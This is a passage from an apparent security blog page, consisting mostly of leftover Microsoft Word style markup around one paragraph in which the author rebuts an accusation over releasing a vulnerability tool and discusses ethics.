/> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif] --></p>
<p class="MsoNormal"><span class="postbody">I accepted his invite and moments later I got the following message from him accusing me of releasing this vulnerability and tool, he then continues to slander me questioning my moral and ethics. Ethics and morals is something that separates the Information Security Professional from the malicious hacker.</span></p>
<p class="MsoNormal"><span class="postbody"><a href="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk3.png"><img class="aligncenter size-medium wp-image-344" title="nettalk3" src="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk3-300x267.png" alt="" width="300" height="267" /></a></span><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    